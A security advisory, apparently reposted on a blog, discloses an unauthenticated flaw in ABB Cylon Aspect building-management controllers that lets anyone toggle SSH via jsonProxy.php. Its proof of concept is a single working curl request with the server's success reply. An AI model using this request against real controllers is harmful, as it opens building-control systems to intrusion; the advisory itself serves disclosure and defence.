Warning: Undefined variable $author_out in /home/afaghhos/domains/afaghhosting.net/public_html/blog/wp-content/plugins/removehide-author-date-category-like-entry-meta/remove-author-date-and-category-metadata.php on line 147

Warning: Undefined variable $date_out in /home/afaghhos/domains/afaghhosting.net/public_html/blog/wp-content/plugins/removehide-author-date-category-like-entry-meta/remove-author-date-and-category-metadata.php on line 160

Warning: Undefined variable $category_out in /home/afaghhos/domains/afaghhosting.net/public_html/blog/wp-content/plugins/removehide-author-date-category-like-entry-meta/remove-author-date-and-category-metadata.php on line 173

Warning: Undefined variable $comment_out in /home/afaghhos/domains/afaghhosting.net/public_html/blog/wp-content/plugins/removehide-author-date-category-like-entry-meta/remove-author-date-and-category-metadata.php on line 186

Warning: Undefined variable $edit_out in /home/afaghhos/domains/afaghhosting.net/public_html/blog/wp-content/plugins/removehide-author-date-category-like-entry-meta/remove-author-date-and-category-metadata.php on line 198

ABB Cylon Aspect 3.08.01 jsonProxy.php Unauthenticated Remote SSH Service Control

ABB Cylon Aspect 3.08.01 (jsonProxy.php) Unauthenticated Remote SSH Service Control

Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
Firmware: <=3.08.01

Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.

Desc: The jsonProxy.php endpoint on the ABB BMS/BAS controller is vulnerable
to unauthorized SSH service configuration changes. An unauthenticated attacker
can enable or disable the SSH service on the server by accessing the FTControlServlet
with the sshenable parameter. The jsonProxy.php script proxies requests to
localhost without enforcing authentication, allowing attackers to modify SSH
settings and potentially gain further unauthorized access to the system.

Tested on: GNU/Linux 3.15.10 (armv7l)
GNU/Linux 3.10.0 (x86_64)
GNU/Linux 2.6.32 (x86_64)
Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
PHP/7.3.11
PHP/5.6.30
PHP/5.4.16
PHP/4.4.8
PHP/5.3.3
AspectFT Automation Application Server
lighttpd/1.4.32
lighttpd/1.4.18
Apache/2.2.15 (CentOS)
OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)

Vulnerability discovered by Gjoko ‘LiquidWorm’ Krstic
@zeroscience

Advisory ID: ZSL-2024-5857
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5857.php

21.04.2024

$ cat project

P R O J E C T

.|
| |
|’| ._____
___ | | |. |’ .—“|
_ .-‘ ‘-. | | .–‘| || | _| |
.-‘| _.| | || ‘-__ | | | || |
|’ | |. | || | | | | || |
____| ‘-‘ ‘ “” ‘-‘ ‘-.’ ‘` |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░

$ curl “http://192.168.73.31/jsonProxy.php?port=7226&application=FTControlServlet?sshenable=1”
<html><head><title>FT Control Servlet</title></head><body>FT Control Servlet Information<br>Version: HTTP/1.0<br>Parameter: “sshenable” Value: “1?”<br>Requested File: /servlets/FTControlServlet<br>SSH RESTART REQUEST successful<br></body>